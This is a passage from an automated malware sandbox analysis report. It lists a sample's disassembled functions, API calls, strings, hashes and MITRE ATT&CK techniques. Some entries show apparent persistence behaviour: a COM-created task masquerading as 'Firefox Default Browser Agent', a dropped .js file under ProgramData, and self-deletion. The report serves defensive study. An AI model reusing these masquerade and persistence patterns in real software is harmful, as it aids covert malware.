HeapAlloc.KERNEL32(00000000), ref: 00BD66FA
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 00BD6769
HeapAlloc.KERNEL32(00000000), ref: 00BD676C

Strings

<, xrefs: 00BD668B

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: <
API String ID: 2637570027-4251816714
Opcode ID: ea724c2abe7c97f11acf9e794f7ddc401e41a850c8baab9b451a01540290dedb
Instruction ID: 841c5619da90b24c91b6e693f9baaf8d019a061061ba01cadcc36a03d652121e
Opcode Fuzzy Hash: ea724c2abe7c97f11acf9e794f7ddc401e41a850c8baab9b451a01540290dedb
Instruction Fuzzy Hash: 4851B038A0120A8FDB24CF68D480BAEFBF4EF49308F2440AED859D7751EB719D068B50

Function 00D15B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D15B97
___except_validate_context_record.LIBVCRUNTIME ref: 00D15B9F
_ValidateLocalCookies.LIBCMT ref: 00D15C28
__IsNonwritableInCurrentImage.LIBCMT ref: 00D15C53
_ValidateLocalCookies.LIBCMT ref: 00D15CA8

Strings

csm, xrefs: 00D15C3D

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 607bfc32ae9713ac09a0047b8bed6966c2486a14e783b9312e45bac894d4dfa8
Instruction ID: 006d3bf6403e62414f27038c48ac21cc08bf88d3878a9c2b1fbb5deb20529b79
Opcode Fuzzy Hash: 607bfc32ae9713ac09a0047b8bed6966c2486a14e783b9312e45bac894d4dfa8
Instruction Fuzzy Hash: 6941A334A00719EBCB10DF68E880ADEBBB2EF85314F148155E8149B355DB35E951CBB0

Function 00D1B51A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00D111AD,?,8DDD1821,?,00D1B629,?,00D195A8,00000000,00D111AD), ref: 00D1B5DB

Strings

api-ms-, xrefs: 00D1B571
ext-ms-, xrefs: 00D1B585

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 7e69fde9c650de908b6eee962b89bd38e7d47695c641ae096e01ab2960819afd
Instruction ID: 6cd8330f408daa6665f214f561414232c904c76305a5c458f602e4d125bba0de
Opcode Fuzzy Hash: 7e69fde9c650de908b6eee962b89bd38e7d47695c641ae096e01ab2960819afd
Instruction Fuzzy Hash: 0021C332A00210BBEB319F24FD40AAE775A9BA1770B280111F901E7390DF34EE41C6F0

Function 00BD8514 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00BD81A6
lstrcmpA.KERNEL32(00000000,INIT), ref: 00BD81B3
StrToIntA.SHLWAPI(00000000), ref: 00BD8276
GetTickCount64.KERNEL32 ref: 00BD867B

Part of subcall function 00BD5760: GetProcessHeap.KERNEL32(00000008,00000001,00BD823E,00000001,00000000), ref: 00BD5763
Part of subcall function 00BD5760: HeapAlloc.KERNEL32(00000000), ref: 00BD576A

StrToIntA.SHLWAPI(00000000), ref: 00BD8574
StrToIntA.SHLWAPI(?), ref: 00BD857D
CreateThread.KERNEL32(00000000,00000000,Function_00007570,00000000,00000000,00000000), ref: 00BD8591
CloseHandle.KERNEL32(00000000), ref: 00BD859C

Part of subcall function 00BD5780: GetProcessHeap.KERNEL32(00000000,00000000,00BD86C5), ref: 00BD5787
Part of subcall function 00BD5780: HeapFree.KERNEL32(00000000), ref: 00BD578E

Sleep.KERNEL32(00000000), ref: 00BD86D6

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$ProcessSleep$AllocCloseCount64CreateFreeHandleThreadTicklstrcmp
String ID:
API String ID: 1253608127-0
Opcode ID: c3b10d666269b400804ce1e8021778733171200425391d8e01901a90ffeebf2a
Instruction ID: 466b51e023e8cfe5f9904ee39caff23d5868e36e7509423deb89667690518e71
Opcode Fuzzy Hash: c3b10d666269b400804ce1e8021778733171200425391d8e01901a90ffeebf2a
Instruction Fuzzy Hash: 92217C71A00615DBCB24ABB49CA1BAEF6E9AF44301F1041ABE912A7391FF34DD008B95

Function 00D15EB4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00D15EAB,00D15A9E,00D150C9), ref: 00D15EC2
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D15ED0
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D15EE9
SetLastError.KERNEL32(00000000,00D15EAB,00D15A9E,00D150C9), ref: 00D15F3B

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d9dcd47aca24710877da4c0809feed74be06c4b20c01104a659bcc8e0c529ca5
Instruction ID: 362c83059a13732b32684fbafe49b4de734d251f7e3be7b03f35b158a452255a
Opcode Fuzzy Hash: d9dcd47aca24710877da4c0809feed74be06c4b20c01104a659bcc8e0c529ca5
Instruction Fuzzy Hash: 3E01283250C715BEA6312674BDC6AE72B64EB66374730022AF020C11F5EF958C839170

Function 00D185A9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8DDD1821,?,?,00000000,00D22264,000000FF,?,00D18585,?,?,00D18559,00000016), ref: 00D185DE
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D185F0
FreeLibrary.KERNEL32(00000000,?,00000000,00D22264,000000FF,?,00D18585,?,?,00D18559,00000016), ref: 00D18612

Strings

mscoree.dll, xrefs: 00D185D7
CorExitProcess, xrefs: 00D185E8

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3148b657072cdf89e2764fc87be0bc9e76e004693cc7936742419a37ee73b9ad
Instruction ID: 37b2f443fe82ea398d6e02a1ec8cfa9f06c23ef1f4932e4f9a12aa6ad2f5b8c0
Opcode Fuzzy Hash: 3148b657072cdf89e2764fc87be0bc9e76e004693cc7936742419a37ee73b9ad
Instruction Fuzzy Hash: D9014431A44769AFDB228F54DC05FAEB7B9FB14B15F040625E811E2290DB789905CAB4

Function 00BD7500 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

wnsprintfW.SHLWAPI ref: 00BD751F
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00BD753B

Part of subcall function 00BD6C60: VariantInit.OLEAUT32(?), ref: 00BD6C77
Part of subcall function 00BD6C60: CoCreateInstance.OLE32(00BD1020,00000000,00000001,00BD1000,?), ref: 00BD6C94
Part of subcall function 00BD6C60: SysAllocString.OLEAUT32(\Mozilla), ref: 00BD6CD4
Part of subcall function 00BD6C60: SysFreeString.OLEAUT32(?), ref: 00BD6D0B
Part of subcall function 00BD6C60: SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 00BD6D18
Part of subcall function 00BD6C60: SysFreeString.OLEAUT32(00000000), ref: 00BD6D2F

Part of subcall function 00BD96E0: GetFileAttributesW.KERNEL32(?,00BD7551), ref: 00BD96E1

DeleteFileW.KERNEL32(?), ref: 00BD755C
ExitProcess.KERNEL32 ref: 00BD7564

Strings

%%ProgramData%%\r%Sr.js, xrefs: 00BD7514

Memory Dump Source

Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$AllocFileFree$AttributesCreateDeleteEnvironmentExitExpandInitInstanceProcessStringsVariantwnsprintf
String ID: %%ProgramData%%\r%Sr.js
API String ID: 3376550436-2368859843
Opcode ID: 11f1bbf37e6d0a49cd4e104e829ce2095946c8da8022aad7bdb492b20b4b79a1
Instruction ID: 02fadf10bc65fcd69da0c44b3eee301865de4a32c226b3e1680626bf705ebf78
Opcode Fuzzy Hash: 11f1bbf37e6d0a49cd4e104e829ce2095946c8da8022aad7bdb492b20b4b79a1
Instruction Fuzzy Hash: 77F0FEB1550218A7CB10EBA0DC5AEDAB76CAB04708F4145E2B755A31A1FFB456C48B15

Function 00D1CC70 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00D1CCF5
__alloca_probe_16.LIBCMT ref: 00D1CDBE
__freea.LIBCMT ref: 00D1CE25

Part of subcall function 00D19565: HeapAlloc.KERNEL32(00000000,00D111AD,?,?,00D111AD,?), ref: 00D19597

__freea.LIBCMT ref: 00D1CE38
__freea.LIBCMT ref: 00D1CE45

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 127d7defbb7c6a79987eb90031ad5db6fa34a2294c3f18ea54b8a5b60b2818c4
Instruction ID: 247b9ca641a1b7ed79484df84fc55baf9512aa90241023eb15a36ca7ca81068d
Opcode Fuzzy Hash: 127d7defbb7c6a79987eb90031ad5db6fa34a2294c3f18ea54b8a5b60b2818c4
Instruction Fuzzy Hash: D351B072650206BBEB219FA8EC45EFB7AAAEF84720F191429FD04D6151EF30DC90C670

Function 00D16FD2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00D16F83,00000000,?,00D2BD4C,?,?,?,00D17126,00000004,InitializeCriticalSectionEx,00D23C98,InitializeCriticalSectionEx), ref: 00D16FDF
GetLastError.KERNEL32(?,00D16F83,00000000,?,00D2BD4C,?,?,?,00D17126,00000004,InitializeCriticalSectionEx,00D23C98,InitializeCriticalSectionEx,00000000,?,00D16EDD), ref: 00D16FE9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00D17011

Strings

api-ms-, xrefs: 00D16FF6

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: fef44e316484ff0b8cb5e356f7fae871a792c8a2d21eeec1e59d1aedfe9f4b0f
Instruction ID: ebd7c99ba10df37487fad75ada9705b96682029b9a8e9d6bd2c9cfa5c7c92995
Opcode Fuzzy Hash: fef44e316484ff0b8cb5e356f7fae871a792c8a2d21eeec1e59d1aedfe9f4b0f
Instruction Fuzzy Hash: 5DE09270344304B6DF301F60FE06B593A659B24B44F144420F90CE40E1DB65DA91A5B0

Function 00D1D13D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(8DDD1821,00000000,00000000,00000008), ref: 00D1D1A0

Part of subcall function 00D1A799: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D1CE1B,?,00000000,-00000008), ref: 00D1A7FA

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00D1D3F2
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00D1D438
GetLastError.KERNEL32 ref: 00D1D4DB

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: d89972d82e9dab11531bdd568c8e5884d91ce0ea05c0eb5f8802589a2fb6f782
Instruction ID: 21dc32d38124f45c149aa219b09ea7b2f05727074536e88615831d1e34af1b09
Opcode Fuzzy Hash: d89972d82e9dab11531bdd568c8e5884d91ce0ea05c0eb5f8802589a2fb6f782
Instruction Fuzzy Hash: FFD16E75D04258AFCB15CFA8E8849EDBBB6FF09310F18456AE455EB351DB30A982CB60

Function 00D15F94 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00D1605B
___AdjustPointer.LIBCMT ref: 00D1607E
___AdjustPointer.LIBCMT ref: 00D1611A

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 6e2b9ddf69d4d00d852d51e4bd51043074f20cb547ed61f0e81a3659423aecf8
Instruction ID: e2b4d1dde15d56f8864355bc2d251999dbeda4e5b31ab6972d074251f6e42634
Opcode Fuzzy Hash: 6e2b9ddf69d4d00d852d51e4bd51043074f20cb547ed61f0e81a3659423aecf8
Instruction Fuzzy Hash: 49519D72604706FFEB298F10F951BEA77A4EF48310F184169E94547295EF32E8C1C6B0

Function 00D1E916 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000), ref: 00D1E92D
GetLastError.KERNEL32(?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008,00000008,?,00D1DAD2,00000000), ref: 00D1E939

Part of subcall function 00D1E8FF: CloseHandle.KERNEL32(FFFFFFFE,00D1E949,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008,00000008), ref: 00D1E90F

___initconout.LIBCMT ref: 00D1E949

Part of subcall function 00D1E8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D1E8F0,00D1E0BD,00000008,?,00D1D52F,00000008,00000000,00000000,00000008), ref: 00D1E8D4

WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00D1E0D0,00000000,00000001,?,00000008,?,00D1D52F,00000008,00000000,00000000,00000008), ref: 00D1E95E

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 056b38f83c091c32d941875ec5be663a06a55d7ea95d65d9ce4582269e73fe8d
Instruction ID: c06f0156fdf90ac3d05d097de18a28628b0ef96c5ee1fac9504e4b6829927d9b
Opcode Fuzzy Hash: 056b38f83c091c32d941875ec5be663a06a55d7ea95d65d9ce4582269e73fe8d
Instruction Fuzzy Hash: 61F0AC36501258BBCF722F95EC04AD97F66FB593B1B044051FE19D5221CA32D961EBB0

Function 00D16590 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00D165B5

Strings

MOC, xrefs: 00D165C7
RCC, xrefs: 00D165CF

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 947a34762f0c6655ad64a819b912f2882d97db0595193b88740f80ed4dee3e35
Instruction ID: 7a646aea0851af03a4fd27eab7e518929e12fb02d423789c748e3d23fe02a42b
Opcode Fuzzy Hash: 947a34762f0c6655ad64a819b912f2882d97db0595193b88740f80ed4dee3e35
Instruction Fuzzy Hash: 0E416872900209FFCF15DF98E981AEEBBB5FF48304F184099F905A6215DB35D990DB61

Function 00D11110 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 00D1111B
GetModuleHandleW.KERNEL32(00000000), ref: 00D11162

Strings

kernel32, xrefs: 00D11116

Memory Dump Source

Source File: 00000000.00000002.1171977050.0000000000D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000000.00000002.1171965571.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1171993324.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172006218.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1172018433.0000000000D2D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d10000_SecuriteInfo.jbxd

Similarity

API ID: HandleModule
String ID: kernel32
API String ID: 4139908857-541877477
Opcode ID: 5f1660116de888cc0302fa6a76f9faf16aee646de50b2d856854b7d5ad09ab05
Instruction ID: 85755a8c8ab7fa42f4691436a87129e0392d586d34cbf56dcae6a12cc736934e
Opcode Fuzzy Hash: 5f1660116de888cc0302fa6a76f9faf16aee646de50b2d856854b7d5ad09ab05
Instruction Fuzzy Hash: AB21C8B9D00208FBCB04DFE4D945AEEBBB4EF48304F148558EA05A7240EA349A85CB71

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

